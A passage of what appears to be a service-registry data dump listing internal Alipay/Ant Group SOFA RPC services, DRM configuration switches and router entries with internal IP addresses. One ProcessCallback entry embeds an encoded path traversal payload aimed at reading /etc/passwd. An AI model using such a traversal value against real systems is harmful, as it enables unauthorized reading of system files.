,"com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.OpenFormQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TRADEINTG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bcm.common.service.facade.SecretKeyOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.RecommendSpecQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.mergeSyncTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY@serverlessbaseapp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.ordermng.apaysales_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequery.common.service.facade.TradeModelQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.etetestcore.etetestcoreDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.integration.tair.TairClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antmetabase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.smartFoParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:algoevaluator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:atomicWordCreateProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcateringorder.common.service.facade.api.order.CateringOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.PasswordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.dialoghistory.api.DialogHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.deposit.api.PointProdDepositContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.payacceptance.PayacceptancePayserviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-BKPROMOGUARD-ALL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csrobot.service.facade.mng.api.chatbots.ChatbotIntentionMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finopencore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.packages.TransportCityPackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.console.OrderConsoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.workorder.WorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.user.service.AgreementQueryRzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:aibenchmark@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.acsellcore.common.service.facade.WorkDiaryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.instrument:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcardcenter.common.service.facade.api.McardItemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insliveprod.common.service.facade.growth.CheckInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.agdsccalipay:name=com.alipay.agdscc.common.service.facade.selleradmitcache.SellerAdmitCacheSwitch.cacheExpireSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.catalog.BusinessCatalogConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.simpleFormat2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.v3.service.facade.api.blacklist.ConfigurationListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igmatrix.common.service.facade.ParticipantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.antfeature.tools.AntEventConverter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkConsistQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.ipaysales.facade.api.contract.IpaysalesContractVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AcctransqueryCacheConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.TaskServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:bollywoodprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.cert.CertManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.DemoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmatrix.facade.SapiensGrayFluxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.rendercontrol.PackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.news.shared.autopush.AutoPushRecService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcsmartdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.salesmng.common.service.facade.sales.SharedataPathService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dms.common.service.ExpScheduleTrigger:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantShopPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.ReleaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ugw.UnifygwServiceSecurityFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.asset.AssetChangeCommitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.RuleRuntimeServiceFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.biz.sign.service.SignQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.logictable.LogicTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.biz.activity.service.MinicenterManageSevice:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kbdiscount:name=com.alipay.kbdiscount.common.service.facade.utils.drm.DiscountConsultSwitchDrm.onlineBuySwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autobizcore.common.fundamental.datafacade.WorkStationLabFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.papers.IDCardValidateProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.permission.PermissionCheckManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:govbizprodsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.88.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.174.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.common.service.rest.asip.RestAsipService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-imock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.controller.ControllerModelConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custcpt.facade.IdGraphService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECURITYEXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secuprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ProjectDeliverReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.TypeFacade:1.0:kTypeFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_14_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.service.MiniappControlFacade:1.0:openapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ApiNotifyRuleFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.UpTopicAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.KbJobShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.DeveloperQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.shop.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:tradefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.wireless.ZoneBizInfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PaybossBizCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_onestop_basicService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.financialdata.FinancialDataManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:pcardcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_LOAN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincapacity.biz.facade.PlanStrategyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.portfolio.PortfolioProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.commonSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_gfsettle_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:oatpexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antsecscheduler.common.service.facade.FortressMachineManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dsoc.service.facade.api.runtime.VerifyTaskService:1.0:${dsoc_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverless.base.facade.ModuleVersionFacade:1.0:paascoregrayfour@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.std.PropertyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:meshycommander@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insThanksEvaluation_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.dynamicParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SysConfigManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.RefundBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.meta.facade.service.FeatureGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingProductStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.MandatoryRedemptionSubTransCodeDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.iot.IotPaymentAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.singleOuDcSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ClaimCommonDRMClient.sendMedicalCallBack,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:test_service2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.sdlib.namelist.StrategyWhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.sales.MerchantConfirmQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.FundUserTagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.OrderSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.ProductPageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.iotpay.spi.service.IotPayBizChannel:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.testapi.BatchTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oasis.common.service.facade.cluster.manager.ForGatewayTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.product.BlackListDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.indicator.IndicatorCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm7312#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.notCheckAmountCustomsIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.core.dal.service.FeatureModelDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.specifiedAuthRouteBankIdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linke.aci.JobQueryService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.common.service.facade.conditionGroup.ConditionGroupService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.initiativeCloseOrderTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ifinflux.common.service.facade.RouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igpayrouter.common.service.facade.RouterApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.common.manage.api.AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.ucdpcoreSwitchSceneStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.xviewcore:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.readConsistDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.208.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.184.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.116.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.TopBoothDrmResource.loadtestNomoQueryAppKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.70.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditcontentprod.facade.service.dynamic.SchemaManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.baseinfo.EpBusinessinfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zplayback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.RiskstormAcctMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.close.CloseUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ISUPERGWMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.custcenter.bizservice.facade.DivisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.unifygw.facade.service.UnifygwSpiFacade:1.0:unifygwSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.report.common.service.facade.api.outline.OutlineOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tbapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbknowledgegraph@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.ResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.arcore.LifeRssSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acwareslifecore.common.service.facade.BusinessApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.69.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.common.service.facade.autooperate.MerchantPlanFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.wireless.IsvSuiteTicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechannel.senior.common.service.facade.spaccprod.api.SpaccTransProdPCFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.development.service.DevelopMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antsecbase.facade.semantic.SemanticKnowledgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.geabase.GeaBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:wj@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.60.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imemberprod.service.facade.api.PublicKeyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwdssp.service.DistributeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.26.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.common.service.facade.CampLabelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.facade.tenant.TenantCategoryAreaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imemberprod.service.facade.api.SignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:creditutcoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.isOpenFixedPurchase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_easy_member_platform_settle_apply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.ReteManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.api.shopservice.ShopSpecServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:cem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.biz.graphstrategy.repository.GraphStrategyRepoLoadingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.suiteide.common.service.facade.api.SuiteFacade:1.0@DEFAU